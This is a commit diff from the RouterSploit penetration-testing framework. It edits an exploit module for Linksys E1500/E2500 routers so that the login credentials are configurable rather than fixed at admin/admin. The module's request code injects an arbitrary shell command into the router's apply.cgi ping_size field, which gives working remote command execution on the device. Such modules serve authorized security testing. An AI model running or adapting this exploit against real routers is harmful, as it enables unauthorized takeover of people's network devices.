updated authentication

a35055a4 · n00py · 02dac2c0 · a35055a4
Commit a35055a4 authored Apr 11, 2016 by n00py
Hide whitespace changes
Inline Side-by-side

Showing with 5 additions and 4 deletions

1500_2500_rce.py routersploit/modules/exploits/linksys/1500_2500_rce.py +5 -4

No files found.
--- a/routersploit/modules/exploits/linksys/1500_2500.py
+++ b/routersploit/modules/exploits/linksys/1500_2500.py
@@ -18,7 +18,6 @@ class Exploit(exploits.Exploit):
        ],
        'references': [
            'https://www.exploit-db.com/exploits/24475/',
-            ""
        ],
        'targets': [
            'Linksys E1500/E2500',
@@ -27,6 +26,8 @@ class Exploit(exploits.Exploit):

    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
    port = exploits.Option(80, 'Target Port')
+    username = exploits.Option('admin', 'Username to login with')
+    password = exploits.Option('admin', 'Password to login with')

    def run(self):
        if self.check() == True:
@@ -45,13 +46,13 @@ class Exploit(exploits.Exploit):
        url = sanitize_url("{}:{}/apply.cgi".format(self.target, self.port))
        data = {"submit_button": "Diagnostics", "change_action":"gozila_cgi", "submit_type":"start_ping","action":"","commit":"0","ping_ip":"127.0.0.1","ping_size": "&" + cmd,"ping_times":"5","traceroute_ip":"127.0.0.1" }
        try:
-            r = requests.post(url, data=data, auth=("admin", "admin"))
+            r = requests.post(url, data=data, auth=(self.username, self.password))
        except requests.exceptions.MissingSchema:
            return "Invalid URL format: %s" % url
        except requests.exceptions.ConnectionError:
            return "Connection error: %s" % url

-        return r.text.strip()
+        return ""

    def check(self):
        # meaby random mark should be implemented
@@ -60,7 +61,7 @@ class Exploit(exploits.Exploit):
        data = {"submit_button": "Diagnostics", "change_action":"gozila_cgi", "submit_type":"start_ping","action":"","commit":"0","ping_ip":"127.0.0.1","ping_size": "&" + cmd,"ping_times":"5","traceroute_ip":"127.0.0.1" }

        try:
-            r = requests.post(url, data=data, auth=("admin", "admin"))
+            r = requests.post(url, data=data, auth=(self.username, self.password))
            res = r.text
        except:
            return None # could not be verified